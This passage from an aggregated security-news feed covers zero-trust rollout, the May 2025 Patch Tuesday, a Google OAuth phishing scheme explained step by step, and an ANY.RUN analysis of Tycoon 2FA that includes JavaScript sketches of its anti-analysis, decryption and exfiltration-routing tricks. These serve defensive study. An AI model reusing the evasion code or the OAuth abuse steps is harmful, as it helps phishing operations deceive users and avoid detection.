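# Minimal sketch of the zero-trust idea: every request is evaluated against
# the current context rather than trusted by network location.
def evaluate(ctx: dict) -> str:
    """Return an access decision for one connection attempt."""
    if not ctx.get("mfa_passed"):
        return "deny"
    if not ctx.get("device_compliant"):
        return "deny"
    if ctx.get("risk_score", 0) > 70:   # context changed: force re-verification
        return "step-up"
    return "allow"

decision = evaluate({"mfa_passed": True, "device_compliant": True, "risk_score": 10})
```

The key property is that the function runs on every connection and transaction, so a previously allowed session can be downgraded the moment its context changes.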

In addition to the oldest and best-known guidelines, such as Forrester’s first report and Google’s BeyondCorp, the components of zero trust are detailed in NIST SP 800-207 (Zero Trust Architecture), while the separate NIST SP 1800-35B offers implementation recommendations. There are also guidelines that map specific infosec measures and tools to the zero trust methodology, such as CIS Controls v8. CISA offers a handy maturity model, though it’s primarily optimized for government agencies.

In practice, zero trust implementation rarely follows the rule book, and many CISOs end up having to mix and match recommendations from these guidance documents with the guidelines of their key IT suppliers (for example, Microsoft), prioritizing and selecting measures based on their specific situation.

What’s more, all these guides are less than forthcoming in describing the complexities of implementation.

Executive buy-in

Zero trust migration isn’t purely a technical project, and therefore requires substantial support on the administrative and executive levels. In addition to investing in software, hardware, and user training, it demands significant effort from various departments, including HR. Company leadership needs to understand why the changes are needed and what they’ll bring to the business.

To get across the value and importance of a project, the “incident cost” or “value at risk” needs to be clearly communicated on the one hand, as do the new business opportunities on the other. For example, zero trust protection can enable broader use of SaaS services, employee-owned devices, and cost-effective network organization solutions.

Alongside on-topic meetings, this idea should be reinforced through specialized cybersecurity training for executives. Not only does such training instill specific infosec skills, it also allows your company to run through crisis management and other scenarios in a cyberattack situation — often using specially designed business games.

Defining priorities

To understand where and what zero trust measures to apply in your infrastructure, you’ll need a detailed analysis of the network, applications, accounts, identities, and workloads. It’s also crucial to identify critical IT assets. Typically making up just a tiny part of the overall IT fleet, these “crown jewels” either contain sensitive and highly valuable information, or support critical business processes. Consolidating information about IT assets and their value will make it easier to decide which components are most in need of zero trust migration, and which infosec measures will facilitate it. This inventory will also unearth outdated segments of the infrastructure for which migration to zero trust would be impractical or technically infeasible.

You need to plan in advance for the interaction of diverse infrastructure elements, and the coexistence of different infosec measures to protect them. A typical problem goes as follows: a company has already implemented some zero trust components (for example, MFA and network segmentation), but these operate completely independently, and no processes and technologies are planned to enable these components to work together within a unified security scenario.

Phased implementation

Although planning for zero trust architecture is done holistically, its practical implementation should begin with small, specific steps. To win managerial support and to test processes and technologies in a controlled environment, start with measures and processes that are easier to implement and monitor. For example, introduce multi-factor authentication and conditional access just for office computers and the office Wi-Fi. Roll out tools starting with specific departments and their unique IT systems, testing both user scenarios and the performance of infosec tools, all while adjusting settings and policies accordingly.

Which zero trust architecture components are easier to implement, and what will help you achieve the first quick wins depends on your specific organization. But each of these quick wins should be scalable to new departments and infrastructure segments; and where zero trust has already been implemented, additional elements of the zero trust architecture can be piloted.

While a phased implementation may seem to increase the risk of getting stuck at the migration stage and never completing the transition, experience shows that a “big bang” approach — a simultaneous shift of the entire infrastructure and all processes to zero trust — fails in most cases. It creates too many points of failure in IT processes, snowballs the load on IT, alienates users, and makes it impossible to correct any planning and implementation errors in a timely and minimally disruptive manner.

Phased implementation isn’t limited to first steps and pilots. Many companies align the transition to zero trust with adopting new IT projects and opening new offices; they divide the migration of infrastructure into stages — essentially implementing zero trust in short sprints while constantly monitoring performance and process complexity.

Managing identities… and personnel

The cornerstone of zero trust is a mature Identity Access Management (IAM) system, which needs to be not only technically sound but also supported administratively at all times. Data on employees, their positions, roles, and resources available to them must be kept constantly up-to-date, requiring significant support from HR, IT, and the leadership of other key departments. It’s imperative to involve them in building formal processes around identity management, taking care to ensure that they feel personally responsible for these processes. It must be stressed that this isn’t a one-off job — the data needs to be checked and updated frequently to prevent situations such as access creep (when permissions issued to an employee for a one-time project are never revoked).
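Access creep of the kind described above can be caught by periodically diffing each employee’s grants against their role’s baseline; a minimal Python sketch with invented roles and permissions:

```python
# Sketch: flag permissions an employee holds beyond their role's baseline.
# Roles and permission names are invented for illustration.
ROLE_BASELINE = {
    "accountant": {"erp_read", "erp_post"},
    "developer": {"repo_read", "repo_write", "ci_run"},
}

def excess_grants(role: str, grants: set[str]) -> set[str]:
    """Permissions to review and, most likely, revoke."""
    return grants - ROLE_BASELINE.get(role, set())

# A one-time project grant that was never revoked shows up immediately:
stale = excess_grants("accountant", {"erp_read", "erp_post", "prod_db_admin"})
```

Running a check like this on a schedule, with HR-maintained role data as input, turns the "frequent review" requirement into a routine report rather than a manual audit.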

To improve information security and make zero trust implementation a truly team effort, sometimes it’s even necessary to change the organizational structure and areas of responsibility of employees — breaking down silos that confine people within narrow job descriptions. For example, one large construction company shifted from job titles such as “Network Engineer” and “Server Administrator” to the more generic “Process Engineer” to underscore the interconnectivity of the roles.

Training and feedback

Zero trust migration doesn’t pass unnoticed by employees. They have to adapt to new authentication procedures and MFA tools, learn how to request access to systems that don’t grant it by default, be aware that they might occasionally need to re-authenticate to a system they logged in to just an hour ago, and get used to previously unseen tools like ZTNA, MDM, or EDR (often bundled in a single agent, but sometimes separate) suddenly appearing on their computers. All this requires training and practice.

For each phase of implementation, it’s worth forming a “focus group” of business users. These users will be the first to undergo training and can help refine training materials in terms of language and content, as well as provide feedback on how the new processes and tools are working. Communication with users should be a two-way street: it’s important to convey the value of the new approach, while actively listening to complaints and recommendations to adjust policies (both technical and administrative), address shortcomings, and improve the user experience.

Kaspersky official blog – ​Read More

Microsoft Patch Tuesday for May 2025 — Snort rules and prominent vulnerabilities

Microsoft Patch Tuesday for May 2025 — Snort rules and prominent vulnerabilities

Microsoft has released its monthly security update for May of 2025 which includes 78 vulnerabilities affecting a range of products, including 11 that Microsoft marked as “critical”.  

Microsoft noted five vulnerabilities that have been observed to be exploited in the wild. CVE-2025-30397 is a remote code execution vulnerability in the Microsoft Scripting Engine. There were also four elevation of privilege vulnerabilities being actively exploited, CVE-2025-32709, CVE-2025-30400, CVE-2025-32701 and CVE-2025-32706 affecting the Ancillary Function Driver for WinSock, the DWM Core Library and the Windows Common Log File System Driver.  

The eleven “critical” entries consist of five remote code execution (RCE) vulnerabilities, four elevation of privilege vulnerabilities, one information disclosure vulnerability, and one spoofing vulnerability. Three of the critical vulnerabilities have been marked as “Exploitation more likely”: CVE-2025-30386, a Microsoft Office RCE vulnerability; CVE-2025-30390, an Azure ML Compute elevation of privilege vulnerability; and CVE-2025-30398, a Nuance PowerScribe 360 information disclosure vulnerability.  

The most notable of the “critical” vulnerabilities listed affect Microsoft Office. CVE-2025-30386 is an RCE vulnerability with a CVSS 3.1 base score of 8.3. To successfully exploit CVE-2025-30386, an attacker could send a victim an email that triggers a use-after-free scenario without the victim clicking a link, viewing, or otherwise interacting with the message, allowing arbitrary code to be executed. Microsoft has assessed that the attack complexity is “Low” and exploitation is “More likely”. Another RCE vulnerability affecting Microsoft Office, CVE-2025-30377, has a CVSS 3.1 base score of 8.4 and has been assessed an attack complexity of “Low”, but exploitation is considered “Less Likely”. 

Two RCE vulnerabilities affect the Remote Desktop Client. CVE-2025-29966 and CVE-2025-29967 are both heap-based buffer overflow vulnerabilities with CVSS 3.1 base scores of 8.8, “Low” attack complexity, and exploitation assessed as “Less Likely”. An attacker controlling a Remote Desktop Server could trigger the buffer overflow when a vulnerable Remote Desktop Client connects to the server. 

CVE-2025-29833 is an RCE vulnerability affecting the Virtual Machine Bus. This is a Time-of-check Time-of-use (TOCTOU) race condition that has been assessed an attack complexity of “High”, and exploitation is “Less Likely”. 

Talos would also like to highlight the following “important” vulnerabilities as Microsoft has determined that exploitation is “More likely”: 

  • CVE-2025-24063 – Kernel Streaming Service Driver Elevation of Privilege Vulnerability 
  • CVE-2025-29841 – Universal Print Management Service Elevation of Privilege Vulnerability 
  • CVE-2025-29971 – Web Threat Defense (WTD.sys) Denial of Service Vulnerability 
  • CVE-2025-29976 – Microsoft SharePoint Server Elevation of Privilege Vulnerability 
  • CVE-2025-30382 – Microsoft SharePoint Server Remote Code Execution Vulnerability 
  • CVE-2025-30385 – Windows Common Log File System Driver Elevation of Privilege Vulnerability 
  • CVE-2025-30388 – Windows Graphics Component Remote Code Execution Vulnerability

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.  

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 64848-64867. There are also these Snort 3 rules: 64852-64853, 301192-301200, and 301203. 

Cisco Talos Blog – ​Read More

How phishing emails are sent from no-reply@accounts.google.com | Kaspersky official blog

Imagine receiving an email that says Google has received a subpoena to release the contents of your account. The email looks perfectly “Googley”, and the sender’s address appears legitimate too: no-reply@accounts.google.com. A little unnerving (or maybe panic-inducing?) to say the least, right?

And what luck — the email contains a link to a Google support page that has all the details about what’s happening. The domain name in the link looks legit, too, and seems to belong to Google…

Regular readers of our blog have probably already guessed that we’re talking here about a new phishing scheme. And they’d be right. This time, the scammers are exploiting several genuine Google services to fool their victims and make the emails look as convincing as possible. Here’s how it works…

How the phishing email mimics an official Google notification

The screenshot below shows the email that kicks off the attack; and it does a really credible job of pretending to be an alert from Google’s security system. The message informs the user that the company has received a subpoena requesting access to the data in their Google account.

The “from” field contains a genuine Google address: no-reply@accounts.google.com. This is the exact same address Google’s security notifications come from. The email also contains a few details that reinforce the illusion of authenticity: a Google Account ID, a support ticket number, and a link to the case. And, most importantly, the email tells the recipient that if they want to learn more about the case materials or contest the subpoena, they can do so by clicking a link.

The link itself looks quite plausible, too. The address includes the official Google domain and the support ticket number mentioned above. And it takes a savvy user to spot the catch: Google support pages are located at support.google.com, but this link leads to sites.google.com instead. The scammers are, of course, counting on users who either don’t understand such technicalities or don’t notice the word substitution.

If the user isn’t logged in, clicking the link takes them to a genuine Google account login page. After authorizing, they land on a page at sites.google.com, which quite convincingly mimics the official Google support site.

Fake Google Support page created with Google Sites

This is what a fake Google Support page linked in the email looks like. Source

Now, it just so happens that the sites.google.com domain belongs to the legitimate Google Sites service. Launched back in 2008, it’s a fairly unsophisticated website builder — nothing out of the ordinary. The important nuance about Google Sites is that all websites created within the platform are automatically hosted on a google.com subdomain: sites.google.com.

Attackers can use such an address to both lull victims’ vigilance and circumvent various security systems, as both users and security solutions tend to trust the Google domain. It’s little wonder that scammers have increasingly been using Google Sites to create phishing pages.

Spotting fakes: the devil’s in the (email) details

We’ve already described the first sign of a dodgy email: the address of the fake support page located at sites.google.com. Look to the email header for more red flags:

Phishing disguised as an official Google email: note the "to" and "mailed-by" fields

Spot the fake: look at the “to” and “mailed-by” fields in the header. Source

The fields to pay attention to are “from”, “to”, and “mailed-by”. The “from” one seems fine: the sender is the official Google email, no-reply@accounts.google.com.

But lo and behold, the “to” field just below it reveals the actual recipient address, and this one sure looks phishy: me[@]googl-mail-smtp-out-198-142-125-38-prod[.]net. The address is trying hard to imitate some technical Google address, but the typo in the company domain name is a dead giveaway. Moreover, it has absolutely no business being there — this field is supposed to contain the recipient’s email.

As we keep examining the header, another suspicious address pops up in the “mailed-by” field. Now, this one is clearly nowhere near Google territory: fwd-04-1.fwd.privateemail[.]com. Yet again, nonsense like this has no place in an authentic email. For reference, here’s what these fields look like in a real Google security alert:

Genuine Google security alert

The “to” and “mailed-by” fields in a genuine Google security alert

Unsurprisingly, these subtle signs would likely be lost on the average user — especially when they’re already freaked out by the looming legal trouble. Adding to the confusion is the fact that the fake email is actually signed by Google: the “signed-by” field shows accounts.google.com. In the next part of this post, we explain how the criminals managed to achieve this, and then we’ll talk about how to avoid becoming a victim.
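The header sanity check described above can be automated. The sketch below parses a simplified, invented raw message with Python’s standard email module and flags a mismatch between the “From” domain and the Return-Path domain, the envelope field that Gmail’s “mailed-by” label reflects:

```python
import email

# Simplified, invented raw message mimicking the phishing email's headers.
RAW = (
    "From: Google <no-reply@accounts.google.com>\r\n"
    "To: me@googl-mail-smtp-out.example\r\n"
    "Return-Path: <bounce@fwd-04-1.fwd.privateemail.example>\r\n"
    "Subject: Security alert\r\n\r\nbody"
)

def domain(addr: str) -> str:
    """Extract the domain part of an address, dropping a trailing '>'."""
    return addr.rsplit("@", 1)[-1].rstrip(">")

msg = email.message_from_string(RAW)
from_dom = domain(msg["From"].split("<")[-1])   # accounts.google.com
path_dom = domain(msg["Return-Path"])           # privateemail-hosted forwarder
suspicious = from_dom != path_dom               # mismatch -> investigate
```

A real mail gateway does this (and much more) via SPF, DKIM, and DMARC checks; the point here is only that the mismatch a careful human can spot is also trivially machine-checkable.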

Reconstructing the attack step by step

To figure out exactly how the scammers managed to send such an email and what they were after, cybersecurity researchers reenacted the attack. Their investigation revealed that the attackers used Namecheap to register the (now-revoked) googl-mail-smtp-out-198-142-125-38-prod[.]net domain.

Next, they used the same service again to set up a free email account on this domain: me[@]googl-mail-smtp-out-198-142-125-38-prod[.]net. In addition, the criminals registered a free trial version of Google Workspace on the same domain. After that the scammers registered their own web application in the Google OAuth system, and granted it access to their Google Workspace account.

Google OAuth is a technology that allows third-party web applications to use Google account data to authenticate users with their permission. You’ve likely encountered Google OAuth as a way to authenticate for third-party services: it’s the system you use every time you click a “Sign in with Google” button. Besides that, applications can use Google OAuth to obtain permission to, for example, save files to your Google Drive.
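For context, a legitimate OAuth 2.0 authorization-code flow starts with a redirect like the one sketched below; the client_id and redirect_uri are placeholders, and only the standard parameter names are shown:

```python
from urllib.parse import urlencode

# Sketch of the redirect a "Sign in with Google" button produces.
# client_id and redirect_uri are placeholder values.
params = {
    "client_id": "example-client-id.apps.googleusercontent.com",
    "redirect_uri": "https://app.example/callback",
    "response_type": "code",          # authorization-code flow
    "scope": "openid email",          # what the app is asking for
    "state": "random-anti-csrf-token",
}
auth_url = "https://accounts.google.com/o/oauth2/v2/auth?" + urlencode(params)
```

Note that the user authenticates to Google itself, and the app only receives a token scoped to the permissions requested, which is why this scheme leaks no password to the scammers.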

But let’s get back to our scammers. After a Google OAuth application is registered, the service allows sending a notification to the email address associated with the verified domain. Interestingly enough, the administrator of the web application is free to manually enter any text as the “App name” — which seems to be what the criminals exploited.

In the screenshot below, researchers demonstrate this by registering an app with the name “Any Phishing Email Text Inject Here with phishing URLs…”.

Google OAuth allows setting a completely arbitrary web app name, and scammers are taking advantage of this

Registering a web app with an arbitrary name in Google OAuth: the text of a scam email with a phishing link can be entered as a name. Source

Google then sends a security alert containing this phishing text from its official address. This email goes to the scammers’ address on the domain registered through Namecheap, whose email service allows forwarding received messages to any address. All the scammers need to do is set up a forwarding rule and specify the email addresses of potential victims.

How scammers set up a forwarding rule to deliver a phishing email that appears like it's coming from Google

Setting up a forwarding rule that allows sending the fake email to multiple recipients. Source

How to protect yourself from phishing attacks like this one

It’s not entirely clear what the attackers were hoping to achieve with this phishing campaign. Using Google OAuth to authenticate doesn’t mean the victim’s Google account credentials are shared with the scammers. The process generates a token that only provides limited access to the user’s account data — depending on the permissions the user authorized and the settings configured by the scammers.

The fake Google Support page the deceived user lands on suggested that the goal was to convince them to download some “legal documents” supposedly related to their case. The nature of these documents is unknown, but chances are they contained malicious code.

The researchers reported this phishing campaign to Google. The company acknowledged this as a potential risk for users and is currently working on a fix for the OAuth vulnerability. However, how long it will take to resolve the issue remains unknown.

In the meantime, here’s some advice to help you avoid becoming a victim of this and other intricate phishing schemes.

  • Stay calm if you get an email like this. Begin by carefully examining all the email header fields and comparing them to legitimate emails from Google — you likely have some in your inbox. If you see any discrepancies, don’t hesitate to hit “Delete”.
  • Be wary of websites on the google.com domain that are created with Google Sites. Lately, scammers have been increasingly exploiting it for a wide range of phishing schemes.
  • As a general rule, avoid clicking links in emails.
  • Use a robust security solution that will provide timely warnings about danger and block phishing links.

Follow the links below to read about five more examples of out-of-the-ordinary phishing.

Kaspersky official blog – ​Read More

Evolution of Tycoon 2FA Defense Evasion Mechanisms: Analysis and Timeline

Attackers keep improving ways to avoid being caught, making it harder to detect and investigate their attacks. The Tycoon 2FA phishing kit is a clear example, as its creators regularly add new tricks to bypass detection systems. 

In this study, we’ll take a closer look at how Tycoon 2FA’s anti-detection methods have changed over the past several months and suggest ways to spot them effectively. 

This article will discuss: 

  • A review of old and new anti-detection techniques. 
  • How the new tricks compare to the old ones. 
  • Tips for spotting these early. 

Knowing how attackers dodge detection and keeping user detection rules up to date are key to fighting these anti-detection methods. 

What is Tycoon 2FA 

Tycoon 2FA is a modern Phishing-as-a-Service (PhaaS) platform designed to bypass two-factor authentication (2FA) for Microsoft 365 and Gmail. It was first identified by Sekoia analysts in October 2023, though the Saad Tycoon group, which promotes this tool through private Telegram channels, has been active since August 2023. 

Tycoon 2FA uses an Adversary-in-the-Middle (AiTM) approach, where attackers set up a phishing page through a reverse proxy server. After a user enters their credentials and completes the 2FA process, the server captures session cookies, allowing attackers to reuse the session and bypass security measures. 

Currently, Tycoon 2FA is highly popular and widely used by cybercriminals, including the Saad Tycoon group. The platform offers ready-made phishing pages and an easy-to-use admin panel, making it accessible even to less technically skilled attackers. 

Discover the latest examples of Tycoon 2FA attacks using this search query in ANY.RUN’s Threat Intelligence Lookup:

threatName:"Tycoon" 

In 2024, an updated version of Tycoon 2FA was released, featuring enhanced evasion techniques, including dynamic code generation, obfuscation, and traffic filtering to block bots. Phishing emails are now frequently sent from legitimate, potentially compromised email addresses. 

The evolution of this phishing kit continues, with ANY.RUN researchers noting regular updates and new evasion mechanisms in its malicious software. This article aims to investigate and provide technical details on how Tycoon 2FA has evolved, is evolving, and may continue to evolve. 

Before We Begin

Tune in to ANY.RUN’s live webinar on Wednesday, May 14 | 3:00 PM GMT. We welcome heads of SOC teams, managers, and security specialists of different tiers who want to: 

  • Solve common security issues
  • Optimize their work processes 
  • Find out how to save their company’s resources 

Analysis of a Tycoon2FA Attack from 01.10.2024 

Let’s begin the analysis with a typical Tycoon2FA attack observed in October 2024. The attack begins with a malicious URL and employs multiple evasion techniques to avoid detection. Below, we will break down each stage of the attack, highlighting its protective mechanisms and their purposes. 

View sandbox session 

Stage 1: Initial Attack Mechanisms 

The attack starts with a request to the following URL: 

hxxps://stellarnetwork[.]sucileton[.]com/EQn1RAKa/ 

Evasion Mechanism #1: Basic Code Obfuscation 

The page’s source code is obfuscated, making it difficult for automated systems or analysts to interpret its functionality.  

Figure 1: Evasion Mechanisms in Stage 1 of Tycoon 2FA

This is a foundational defense to hinder initial analysis. 

Speed up and simplify detection of malware and phishing threats like Tycoon2FA with proactive analysis in ANY.RUN’s Interactive Sandbox: Sign up with business email.


Evasion Mechanism #2: “Nomatch” Check 

The code compares the URL (part of the attacker’s infrastructure) against a “nomatch” value. This check appears to be a decoy or placeholder, as the comparison always returns False. It may serve as a flag for services like Cloudflare. 

Figure 2: “Nomatch” Evasion Mechanism 

Evasion Mechanism #3: Domain Comparison 

The code verifies whether the current page’s domain matches the attacker’s designated infrastructure domain. If the domains match, the attack proceeds to load Stage 2 (the malicious payload) into the Document Object Model (DOM). If not, a fake error page is displayed. 

Figure 3: Domain Comparison Evasion Mechanism

Evasion Mechanism #4: Redirect to Fake Litespeed 404 Page on Failed Checks 

If the domain check fails, the user is redirected to a fake “Litespeed 404” error page.  

Figure 4: Fake 404 Page Redirect 

The page is designed to appear legitimate and deter further investigation. 

Figure 5: Example of Fake Litespeed 404 Page 

Purpose of Stage 1 Evasion Mechanisms 

Figure 6: Flowchart of Stage 1 Protective Checks in Tycoon 2FA 

These mechanisms are designed to prevent the malicious code from executing or revealing its behavior in isolated scenarios, such as: 

  • Malware analysis sandboxes. 
  • Offline inspection of saved HTML files. 

By ensuring the code only runs in the attacker’s controlled environment, these checks reduce the likelihood of detection. 
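In pseudocode terms, the Stage 1 gate reduces to a simple conditional. The real kit implements this in obfuscated JavaScript; the Python sketch below uses an invented domain purely to show the control flow:

```python
# Python sketch of the Stage 1 logic: proceed only when the page runs on
# the attacker's own domain; otherwise show a decoy 404. Domain invented.
EXPECTED_DOMAIN = "stellarnetwork.attacker.example"

def stage1(current_domain: str, nomatch_flag: str = "nomatch") -> str:
    if current_domain == nomatch_flag:       # decoy check: never true in practice
        return "halt"
    if current_domain == EXPECTED_DOMAIN:
        return "inject-stage2"               # payload goes into the DOM
    return "fake-litespeed-404"              # saved/sandboxed copy sees an error
```

This is why a saved HTML file or a sandbox replaying the page from a different origin never reaches the malicious payload.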

If all Stage 1 checks are passed, the malicious payload (Stage 2) is injected into the page’s DOM, advancing the attack to its next phase. 

Stage 2: Main Evasion Mechanisms 

Evasion Mechanism #5: Cloudflare Turnstile CAPTCHA  

Before loading the main content, Tycoon 2FA requires users to pass a Cloudflare Turnstile CAPTCHA. This protects the malicious page from web crawlers, Safebrowsing services, or automated systems that could capture and analyze the page’s content. 

Figure 7: Cloudflare CAPTCHA in Tycoon 2FA 

Evasion Mechanism #6: Debugger Timing Check 

During Stage 2, the code also measures the time taken to launch a debugger, a technique used to detect whether the page is running in a real browser or a sandboxed environment. In this sample, the check is rudimentary, and the timing result is not actively used, suggesting it may be a placeholder or incomplete feature. 

Figure 8: Debugger Timing Check Mechanism 
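The underlying idea can be sketched as follows (the 100 ms threshold is an assumption; as noted above, this sample does not actually act on the result):

```javascript
// If DevTools are attached, the `debugger` statement pauses execution,
// so the measured delay becomes abnormally large.
function debuggerTimingCheck(thresholdMs = 100) {
  const start = Date.now();
  debugger; // no-op unless a debugger is attached
  return Date.now() - start > thresholdMs; // true => likely being analyzed
}
```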

Evasion Mechanism #7: C2 Server Queries 

Tycoon 2FA sends a series of requests to the attacker’s Command-and-Control (C2) servers to determine whether to proceed to Stage 3. This process involves two steps: 

  • GET Request to Secondary C2 Domain
    A GET request is sent to another C2 domain, expecting a single-byte response: ‘0’ or ‘1’.  
    • If ‘1’ is received, the attack halts, and the user is redirected to a legitimate page.  
    • If ‘0’ is received, the attack continues. 
Figure 10: Code Fragment for Stage 3 Validation Checks 
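The handling of the one-byte response can be sketched like this (the C2 URL is a hypothetical placeholder; the real code runs in the victim’s browser):

```javascript
// Decide what to do based on the one-byte C2 response ('0' or '1').
function handleGateByte(byte) {
  if (byte === '1') return 'redirect-legitimate'; // halt, send the user away
  if (byte === '0') return 'continue-stage3';     // proceed with the attack
  return 'redirect-legitimate';                   // fail closed on anything else
}

// Browser-side usage (hypothetical C2 URL):
//   fetch('https://c2.example/check').then(r => r.text()).then(handleGateByte)
```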

If all Stage 2 checks are successfully passed, the page reloads, and the Stage 3 payload, the core malicious component, is retrieved and executed. 

Stage 3: Payload Unpacking 

Evasion Mechanism #8: Base64 + XOR Obfuscation 

The payload in Stage 3 is obfuscated using a combination of Base64 encoding and XOR encryption with a predefined key. This protects the malicious code from being easily analyzed or detected. 

Figure 11: Code for XOR-Base64 Deobfuscation

After deobfuscation (use this CyberChef recipe), the next stage is revealed, advancing the attack. 
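The scheme is easy to reproduce. A Node.js sketch (the key below is a made-up placeholder, not the one from the sample):

```javascript
// Decode Base64, then XOR each byte with a repeating key.
function xorBase64Decode(b64, key) {
  const data = Buffer.from(b64, 'base64');
  const out = Buffer.alloc(data.length);
  for (let i = 0; i < data.length; i++) {
    out[i] = data[i] ^ key.charCodeAt(i % key.length);
  }
  return out.toString('utf8');
}
```

Because XOR is its own inverse, the same loop followed by a Base64-encode step produces the obfuscated payload.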

Stage 4: Dynamic Payload Retrieval 

During the payload retrieval, a POST request is sent to the attacker’s C2 server. The request body contains data derived from the initial phishing URL, with logic that varies based on whether the victim’s email is included in the URL. 

Figure 12: Code for Sending POST Request 

Evasion Mechanism #9: Encrypted Payload Delivery

The C2 server responds with a JSON file containing ciphertext and decryption parameters. The specific data received depends on the contents of the POST request. The payload is decrypted to reveal the URL for the next stage. 

Figure 13: Code for Decrypting POST Request Response

To see the sample of the retrieved payload and its decryption, visit JSFiddle. The result of this action is the URL for Stage 5. 

Stage 5: Fake Login Page Delivery 

The content in Stage 5 is mostly unobfuscated, presenting a fake Microsoft Outlook login page designed to deceive the victim. It includes SVG assets and a stylesheet to mimic the legitimate interface. 

Figure 14: Loading of Fake MS Outlook Login Page

At the end of the page’s source code, an additional JavaScript script reuses the Base64 + XOR obfuscation technique (previously seen in Stage 3) to hide further malicious code. 

Figure 15: Base64/XOR Obfuscation in Stage 5

Deobfuscating this script reveals the next stage of the attack. 

Stage 6: Fake Authorization and Data Exfiltration 

The frontend mimics a Microsoft Outlook login page, designed to trick victims into entering their credentials. 

Figure 16: Loaded Fake MS Outlook Login Page 

At the end of the source code, a JavaScript script implements several new protective and operational mechanisms: 

Evasion Mechanism #10: Browser Detection 

The script identifies the victim’s browser to tailor the attack or detect analysis environments (e.g., sandboxes).  

Figure 17: Code for Browser Detection 
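Browser identification of this kind typically boils down to user-agent matching. A simplified sketch (not the sample’s actual logic):

```javascript
// Naive user-agent classification; order matters because Chrome's UA
// also contains "Safari", and Edge's contains "Chrome".
function detectBrowser(userAgent) {
  if (/Edg\//.test(userAgent)) return 'edge';
  if (/Firefox\//.test(userAgent)) return 'firefox';
  if (/Chrome\//.test(userAgent)) return 'chrome';
  if (/Safari\//.test(userAgent)) return 'safari';
  return 'unknown';
}

// In the browser: detectBrowser(navigator.userAgent)
```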

Evasion Mechanism #11: Clipboard Manipulation 

The script replaces the clipboard contents with junk data to interfere with analysis or debugging attempts.  

Figure 18: Code for Clipboard Manipulation 

Evasion Mechanism #9 (Reused): Payload Encryption/Decryption 

The script encrypts and decrypts the payload using hardcoded keys and initialization vectors (IVs), protecting data sent to and received from the C2 server.  

Figure 19: Code for Payload Encryption/Decryption 

Evasion Mechanism #12: C2 Routing with Dynamic URLs 

A randomly generated URL for data exfiltration is created using the RandExp library, following a pattern determined by the Tycoon 2FA operation mode (e.g., checkmail, checkpass, twofaselected). This ensures varied C2 communication paths, complicating detection.  

Figure 20: Code for Generating Random Exfiltration URLs 
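The effect can be approximated without the RandExp dependency; the path pattern below is a hypothetical stand-in for whatever per-mode pattern the kit actually generates:

```javascript
// Generate a random exfiltration path for a given operation mode,
// e.g. 'checkmail', 'checkpass', 'twofaselected'.
function randomExfilPath(mode) {
  const token = Array.from({ length: 16 },
    () => Math.floor(Math.random() * 16).toString(16)).join('');
  return `/${mode}/${token}`;
}
```

Each request thus targets a fresh URL, so simple URL-based blocklists never see the same path twice.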

Evasion Mechanism #13: Redirect API Validation 

The script checks the validity of a redirect API, likely used by Tycoon 2FA operators to monitor client status or subscription activity. 

Figure 21: Code for Redirect API Validation

Finally, the stolen data (e.g., credentials) is exfiltrated to a third C2 domain in the attack chain. The response from the C2 server dictates the phishing page’s behavior, such as prompting for 2FA or updating the account status.  

Figure 22: Code for Data Exfiltration

A JSFiddle snippet demonstrates the encryption/decryption of sent/received data.  

At the end of Stage 6, there is a link to another script, which loads the next stage of the attack. 

Figure 23: Link to Next Tycoon 2FA Stage 

Stage 7: Phishing Framework Enhancements 

After deobfuscation, Stage 7 reveals additional functionality for the Phishing-as-a-Service (PhaaS) framework, defining critical operations for the phishing interface. 

The code includes logic for:  

  • Managing the user interface behavior.  
  • Handling transitions between frames.  
  • Rendering core page elements.  
  • Implementing a state machine for the phishing page.  
  • Validating user inputs (e.g., email, password, OTP). 
Figure 24: Code fragment for phishing page State Machine 

Execution Chain Summary 

The complete execution chain, combining all mechanisms from Stages 1–7, is visualized below: 

Detailed breakdown of Tycoon2FA’s attack

With a comprehensive understanding of Tycoon 2FA’s attack flow, we can now analyze newer samples and compare them to this baseline to identify changes or additions to its anti-detection mechanisms. 

New Tycoon2FA Evasion Mechanisms: Timeline 

As we’ve discussed, Tycoon 2FA is steadily evolving, with its developers rolling out more sophisticated anti-detection mechanisms.  

Let’s now examine the latest evasion methods that have emerged in attacks since October. 

Attack Detected on 6 December 2024  

This sample introduces new anti-detection mechanisms in Stage 2, enhancing the malicious payload’s ability to avoid analysis and debugging environments. The following mechanisms were observed: 

Evasion Mechanism #14: Debug Environment Detection 

The script checks if the page is loaded in a legitimate browser rather than a debugging environment, such as Selenium (WebDriver), PhantomJS, or Burp Suite. If a debugging runtime is detected, the attack stops, and the user is redirected to about:blank.   

Figure 25: Code for Detecting Debugging Runtime

Evasion Mechanism #15: Keystroke Interception 

The code intercepts keyboard shortcuts associated with opening browser developer tools or other debugging functions, preventing their default actions. This hinders manual analysis by users or researchers.  

Figure 26: Code for Keystroke Interception 

The intercepted shortcuts include:   

  • F12: Opens DevTools (Generic).  
  • Ctrl + U: Displays page source code.  
  • Ctrl + Shift + I: Opens DevTools (Generic).  
  • Ctrl + Shift + C: Opens the element inspector (Chrome).  
  • Ctrl + Shift + J: Opens the browser console (Chrome/Firefox).  
  • Ctrl + Shift + K: Opens the Web Console (Firefox); duplicates the current tab (Edge).  
  • Ctrl + H: Opens browser history (Generic).  
  • Meta + Alt + I: Opens DevTools (macOS).  
  • Meta + Alt + C: Opens the element inspector (macOS).  
  • Meta + U: Displays page source code (macOS Firefox). 
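A minimal sketch of such a keydown filter, covering the combinations above (in the real page the handler also suppresses the default action):

```javascript
// Return true when a keydown event matches one of the blocked shortcuts.
function isBlockedShortcut(e) {
  const k = e.key.length === 1 ? e.key.toUpperCase() : e.key;
  if (k === 'F12') return true;
  if (e.ctrlKey && e.shiftKey && ['I', 'C', 'J', 'K'].includes(k)) return true;
  if (e.ctrlKey && !e.shiftKey && ['U', 'H'].includes(k)) return true;
  if (e.metaKey && e.altKey && ['I', 'C'].includes(k)) return true;
  if (e.metaKey && !e.altKey && k === 'U') return true;
  return false;
}

// Browser usage:
//   document.addEventListener('keydown', e => {
//     if (isBlockedShortcut(e)) e.preventDefault();
//   });
```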

Evasion Mechanism #16: Context Menu Blocking 

